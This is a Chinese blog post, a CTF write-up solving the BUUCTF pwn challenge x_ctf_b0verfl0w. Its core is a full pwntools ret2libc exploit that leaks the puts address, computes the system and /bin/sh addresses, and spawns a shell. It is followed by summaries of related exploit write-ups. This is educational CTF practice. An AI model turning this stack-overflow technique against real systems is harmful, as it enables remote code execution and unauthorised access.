BUUCTF(pwn)x_ctf_b0verfl0w [ret2libc类型]

最新推荐文章于 2025-06-27 16:01:10 发布
最新推荐文章于 2025-06-27 16:01:10 发布
阅读量497 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45556441/article/details/115470145
这篇博客展示了如何使用ret2libc技术对远程服务器上的程序进行溢出攻击。作者通过发送精心构造的payload,实现了从puts函数地址获取到libc库的地址,进一步定位system函数和/bin/sh字符串的地址,最终实现执行任意命令的目标。博客中涉及了pwn库、ELF文件解析、LibcSearcher工具以及交互式shell的建立。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
在这里插入图片描述在这里插入图片描述是ret2libc类型

from pwn import *

from LibcSearcher import *

p = remote('node3.buuoj.cn',25524)

elf = ELF('./b0verfl0w')

puts_plt=elf.plt['puts']

puts_got=elf.got['puts']

main=0x804850e

payload='a'*(0x20+4)+p32(puts_plt) + p32(main) +p32(puts_got)

p.sendlineafter("What's your name?",payload)

p.recvuntil('.')

puts_addr=u32(p.recv(4))

libc=LibcSearcher("puts",puts_addr)

offset=puts_addr-libc.dump('puts')

sys=offset+libc.dump('system')

bin=offset+libc.dump('str_bin_sh')

payload='a'*(0x20+4)+p32(sys)+p32(0)+p32(bin)

p.sendlineafter("What's your name?",payload)

p.interactive()
[NewStarCTF 公开赛赛道]ret2libcBUUCTF
Welcome To Myon'Blog !
05-20 829
本文描述了一个64位程序的栈溢出漏洞利用过程。程序开启了NX保护,且没有直接提供/bin/sh字符串和system函数。通过分析,作者采用了ret2libc攻击思路,利用puts函数泄露其真实地址,进而计算libc基址,获取system函数和/bin/sh字符串的地址。首先,通过构造第一个payload,利用pop_rdi和ret指令将puts函数的真实地址泄露出来,并返回到main函数。接着,构造第二个payload,将/bin/sh字符串地址传入rdi寄存器,调用system函数,最终成功获取shell
ROP链-BUUCTF-inndy_rop(ret2syscall)
Welcome To Myon'Blog !
05-08 453
因为 pop dword ptr [ecx] 一次只能写入 4 个字节,所以我们分两次写入 /bin/sh。静态链接就意味着没法去打 ret2libc 了,因为 ret2libc 需要用到动态链接库里面的系统函数。后面就是常规的 ret2syscall 了,即系统调用 execve。既然有对 [ecx] 操作的,那么我们就继续找弹出 ecx 的指令。注意到左侧函数表有很多的函数,说明这个程序是静态链接的。找一个具有写权限的段,一般都是在 bss 段。找了一下,没有字符串 /bin/sh。
BUUCTF ciscn_2019_c_1(ret2libc
weixin_45441024的博客
01-04 511
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
BUUCTF(pwn)x_ctf_b0verfl0w
半岛铁盒的博客
04-01 437
flag的地址有了 execve() – 叫做执行程序函数 就像Python中的os.system(cmd)这个函数,我们可以用这个函数来执行我们的shell脚本,单独的shell命令,或者是调用其他的程序,我们的execve()这个函数就和Python中的os.system函数类似,可以调用其他程序的执行,执行shell命令,,调用脚本等等功能。 from pwn import* flag=0x401157 payload='a'*(0x110+8)+p64(flag) p=remote('..
保姆级教程:手把手通关BUUCTF ciscn_2019_c_1 (栈溢出 + ROP + 信息泄露 +ret2libc)
最新发布
2301_76794844的博客
06-27 1509
保姆级教程:手把手通关BUUCTF ciscn_2019_c_1 (栈溢出 + ROP + 信息泄露 +ret2libc)
[BUUCTF-pwn]——x_ctf_b0verfl0w
Y_peak的博客
03-27 749
[BUUCTF-pwn]——x_ctf_b0verfl0w 很简单的一个ret2libc题型,利用栈溢出,构造循环调用 第一次leek地址,之后就可以构造我们想要的rop链了 exploit from pwn import * from LibcSearcher import * #p = process('./b0verfl0w') p = remote('node3.buuoj.cn',26806) elf = ELF('./b0verfl0w') context.log_level = 'debug
[BUUCTF]PWN——x_ctf_b0verfl0w(汇编代码写shellcode+jump esp指令劫持esp)
mcmuyanga的博客
02-04 1847
x_ctf_b0verfl0w 附件 步骤 例行检查,32位程序,开启了RELRO(不可改写got表) 本地试运行一下程序,看看大概的情况 32位ida载入 fgets可以溢出,但是只可以溢出0x32-0x20-0x4=14字节,由于没有开启nx,首先想到的是shellcode,0x20肯定放不进pwntools生成的shellcode,只能自己手写,但是得想办法劫持esp去执行我们的shellcode 在hit函数中找到了jump esp的gadget 因此我们可以构造这样的栈
[BUUCTF]PWN——cmcc_pwnme1(ret2libc)
mcmuyanga的博客
01-30 828
cmcc_pwnme1 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行一下,看看大概的情况 32位ida载入,检索字符串的时候发现了读出flag的函数 这个flag的位置不清楚对不对,按照buu的习性,应该不对 main() getfruit(),这边存在栈溢出 先试一下那个读出flag的函数,和我想的一样,buu上flag的目录不在那儿 因为看到没用开启nx,所以一开始想要使用shellcode,但是碍于没法获得参数v1在栈上的位置,就换用ret2libc的方法了 完整ex
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2558
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
[CTF]PWN--新人入门第一关--Ret2libc
2301_79880752的博客
02-29 1656
首先我们需要找到pop rdi|ret这个指令在程序中的位置(前面提到该指令为程序中自带的,只不过需要我们去寻找),然后让程序返回到pop rdi|ret这个指令上去执行它,通过ROPgadget --binary pwn --only 'pop|ret' 该指令来寻找pop |ret这个指令的地址,其中ROPgadget为一个插件,需要自己下载,binary意思为一个二进制文件,后面跟着的是文件名,only后面跟着的为要搜索的命令地址。
[NewStarCTF 2023 公开赛道]ret2libcBUUCTF
Welcome To Myon'Blog !
05-22 419
本文描述了一个典型的ret2libc漏洞利用过程。首先,通过IDA反编译发现main函数中的read函数存在溢出漏洞,但程序中没有直接提供/bin/sh字符串和system函数。通过puts函数泄露libc基址,进而计算system函数和/bin/sh字符串的地址。利用gadget构造payload,首先通过puts泄露地址,然后再次发送payload调用system函数执行/bin/sh,最终成功获取flag。整个过程展示了如何在没有直接提供libc文件的情况下,通过泄露地址和计算偏移来实现漏洞利用。
x_ctf_b0verfl0w
qq_62887641的博客
09-19 223
32位,保护全关,写shellcode栈溢出并且有个hit给出了jmp esp。
x_ctf_b0verfl0ww
z1r0的博客
01-11 1087
x_ctf_b0verfl0ww 查看保护 有溢出但是空间小不可以ret2libc。没开nx看见不有一个hint 有个jmp esp,这是一个好跳板,可以去看一下0day安全这个书,里面讲到了jmp esp的灵活运用。写shellcode进去,然后通过jmp esp 和 sub esp, xx,jmp esp来执行shellcode即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name
BUUCTF pwn x_ctf_b0verfl0w
zwb2603096342的博客
05-29 996
pwn中ret2shellcode的变式,shellcode长度限制
X-CTF Quals 2016 - b0verfl0w [Stack Pivoting]
ACdream
02-13 1166
学习资料: https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/fancy-rop/#stack-pivoting 为什么要使用? (1)栈溢出时,覆盖后剩下的栈空间不够写exp、ROP等溢出利用 (2)开启了PIE,栈地址不固定,没法利用 要求:可以控制EIP或ESP的至少一个,利用gadgets: pop esp...
【Writeup】X-CTF Quals 2016_Pwn_b0verfl0w
BAKUMANSEC - Just Do It
09-02 677
0x01 解题思路 查看文件信息   没有开NX,可以向栈上写入shellcode。防护措施只开了一个Partial RELRO,这意味着每次栈加载的地址会变化。 拖入IDA 32 bits查看 main函数里只有一个vuln函数   显然存在栈溢出,但是只能输入50个字节,而填充的padding字段就需要0x20+4=36个字节,再加上EIP,一共40个字节,只有10个字节的shellc...
BUUCTF--pwn--jarvisoj_level3【ret2libc
qq_73149934的博客
12-04 449
BUUCTF--pwn--jarvisoj_level3
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 500
buuctf-pwn 001-016题wp
ret2libc
huzai9527的博客
02-03 588
1. buooj - ciscn_2019_c_1(64 位) from pwn import * #p = remote('node3.buuoj.cn',28190) p = process('./ciscn_2019_c_1') context.log_level = 'debug' puts_plt = 0x4006e0 puts_got = 0x602020 gets_got = 0x602050 pop_rdi = 0x0000000000400c83 main = 0x4009a0 #ste
ctf wiki pwn ret2libc
03-01
### CTF PWN Ret2libc 攻击教程与实例 Ret2libc是一种利用栈溢出漏洞的技术,在这种技术下,攻击者通过覆盖返回地址来调用系统中的现有函数(通常是`system()`),从而执行任意命令。当面对静态链接的二进制文件时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值